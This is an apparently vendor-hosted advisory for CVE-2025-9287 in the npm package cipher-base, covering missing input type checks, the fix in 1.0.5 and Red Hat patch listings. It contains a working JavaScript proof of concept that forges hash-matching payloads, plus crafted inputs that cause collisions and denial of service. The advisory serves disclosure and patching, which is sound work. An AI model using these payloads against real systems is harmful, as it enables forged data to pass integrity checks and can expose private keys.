CVE-2025-9287 — cipher-base
Fix: browserify/cipher-base#23CVE-2025-9287 is a Improper Input Validation vulnerability in cipher-base. A fix is available for cipher-base — see the affected versions and patch details below.
Missing type checks leading to hash rewind and passing on crafted data
Exploitation Status
Proof-of-concept exploit code exists
- CISA’s SSVC triage found public proof-of-concept exploit code for this CVE, though no confirmed active exploitation.
Exploitation and automatability from CISA’s SSVC triage for CVE-2025-9287.
EPSS Exploitation Probability
EPSS (Exploit Prediction Scoring System) is a daily probability model maintained by FIRST.org. It estimates the likelihood a CVE will be exploited in production environments within the next 30 days, derived from real-world threat intelligence signals.
Real-World Exposure
How broadly this vulnerability is actually deployed: weekly install volume shows current usage, and reverse-dependency count shows how many other packages break if it stays unpatched.
cipher-basenpmDescription
Summary
This affects e.g. create-hash (and crypto-browserify), so I'll describe the issue against that package
Also affects create-hmac and other packages
Node.js createHash works only on strings or instances of Buffer, TypedArray, or DataView.
Missing input type checks (in npm create-hash polyfill of Node.js createHash) can allow types other than a well-formed Buffer or string, resulting in invalid values, hanging and rewinding the hash state (including turning a tagged hash into an untagged hash), or other generally undefined behaviour.
Details
See PoC
PoC
const createHash = require('create-hash/browser.js')
const { randomBytes } = require('crypto')
const sha256 = (...messages) => {
const hash = createHash('sha256')
messages.forEach((m) => hash.update(m))
return hash.digest('hex')
}
const validMessage = [randomBytes(32), randomBytes(32), randomBytes(32)] // whatever
const payload = forgeHash(Buffer.concat(validMessage), 'Hashed input means safe')
const receivedMessage = JSON.parse(payload) // e.g. over network, whatever
console.log(sha256(...validMessage))
console.log(sha256(...receivedMessage))
console.log(receivedMessage[0])
Output:
9ef59a6a745990b09bbf1d99abe43a4308b48ce365935e29eb4c9000984ee9a9
9ef59a6a745990b09bbf1d99abe43a4308b48ce365935e29eb4c9000984ee9a9
Hashed input means safe
This works with:
const forgeHash = (valid, wanted) => JSON.stringify([wanted, { length: -wanted.length }, { ...valid, length: valid.length }])
But there are other types of input which lead to unchecked results
Impact
- Hash state rewind on
{length: -x}. This is behind the PoC above, also this way an attacker can turn a tagged hash in cryptographic libraries into an untagged hash. - Value miscalculation, e.g. a collision is generated by
{ length: buf.length, ...buf, 0: buf[0] + 256 }This will result in the same hash as ofbuf, but can be treated by other code differently (e.g. bn.js) - DoS on
{length:'1e99'} - On a subsequent system, (2) can turn into matching hashes but different numeric representations, leading to issues up to private key extraction from cryptography libraries (as nonce is often generated through a hash, and matching nonces for different values often immediately leads to private key restoration, like GHSA-vjh7-7g9h-fjfh)
- Also, other typed arrays results are invalid, e.g. returned hash of
new Uint16Array(5)is the same asnew Uint8Array(5), notnew Uint16Array(10)as it should have been (and is in Node.jscrypto) -- same for arrays with values non-zero, their hashes are just truncated to%256instead of converted to correct bytelength
Affected Packages
| Ecosystem | Package | Vulnerable range | Fix |
|---|---|---|---|
| 📦npm | cipher-base | all versions | 1.0.5npm install cipher-base@1.0.5 |
Detection & mitigation playbook
Open-source dependencyDetect
Scan your dependency tree (package-lock.json, pnpm-lock.yaml, requirements.txt, go.sum, etc.) for cipher-base, including transitive dependencies — a direct dependency you never call can still pull in a vulnerable version.
Fix
Update cipher-base to 1.0.5 or later, then make sure no transitive (indirect) dependency still pins the vulnerable range — O3 confirms CVE-2025-9287 is resolved across your whole dependency graph.
Workarounds
If you can't upgrade right away: gate or disable the affected feature, validate untrusted input at the boundary, and avoid passing attacker-controlled data into the vulnerable path. O3's runtime protection blocks exploitation in production as an interim safeguard until the upgrade lands.
How O3 protects you
O3 Security's impact-aware SCA analyses which vulnerable code paths your application actually calls, so a match like CVE-2025-9287 can be triaged on real exposure rather than presence alone.
Tailored to CVE-2025-9287. Runtime protection reduces exposure until a permanent patch is applied and verified — it complements patching, it doesn't replace it.
Fixing This On Your OS
If you run this on a Linux distribution, patch through your package manager against the distro's own security advisory below — it tracks the exact backported fix for your release, which can ship on a different timeline (and sometimes a different severity) than the upstream project.
| Product | Fixed in | Advisory |
|---|---|---|
| multicluster engine for Kubernetes 2.7 for RHEL 8 | multicluster-engine-assisted-service-8-container-v2.7.6-2 | RHSA-2025:18278 |
| Red Hat Advanced Cluster Management for Kubernetes 2.12 for RHEL 9 | acm-cli-container-v2.12.5-4 | RHSA-2025:18744 |
| multicluster engine for Kubernetes 2.6 | multicluster-engine/console-mce-rhel9:v2.6 | RHSA-2025:23528 |
| multicluster engine for Kubernetes 2.8 | multicluster-engine/console-mce-rhel9:1765829333 | RHSA-2026:0722 |
| multicluster engine for Kubernetes 2.9 | multicluster-engine/console-mce-rhel9:v2.9 | RHSA-2025:19332 |
| Red Hat Advanced Cluster Management for Kubernetes 2.11 | rhacm2/console-rhel9:v2.11 | RHSA-2025:23529 |
| Red Hat Advanced Cluster Management for Kubernetes 2.13 | rhacm2/console-rhel9:1768001980 | RHSA-2026:0627 |
| Red Hat Advanced Cluster Management for Kubernetes 2.14 | rhacm2/console-rhel9:v2.14 | RHSA-2025:19335 |
Frequently Asked Questions
Is CVE-2025-9287 in your dependencies?
O3 Security finds CVE-2025-9287 across npm dependencies, including transitive ones, and its impact-aware SCA ranks findings by whether your code actually calls the vulnerable path.